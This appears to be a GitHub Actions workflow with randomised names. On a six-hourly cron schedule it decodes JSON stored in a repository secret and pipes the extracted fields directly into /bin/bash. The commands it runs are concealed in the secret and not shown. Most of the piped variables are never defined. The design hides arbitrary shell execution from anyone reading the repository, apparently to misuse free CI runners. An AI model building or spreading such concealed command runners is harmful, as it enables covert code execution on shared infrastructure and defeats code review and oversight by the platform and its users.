name: yinkaldk
on:
  workflow_dispatch:
  schedule:
    - cron: '10 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yinkaldk
        env:
          qbnfv8: ${{ secrets.qbnfv8 }}
        run: |
          echo $qbnfv8 | jq -r .ab7493 | /bin/bash
          echo $fwfv31 | jq -r .horql8 | /bin/bash
          echo $d550 | jq -r .aqyr1446 | /bin/bash
          echo $dtw10 | jq -r .nru1670 | /bin/bash
          echo $w84563 | jq -r .ou23062 | /bin/bash
          echo $uthnp994 | jq -r .bwfre92601 | /bin/bash
          echo $au5 | jq -r .hdvin68 | /bin/bash

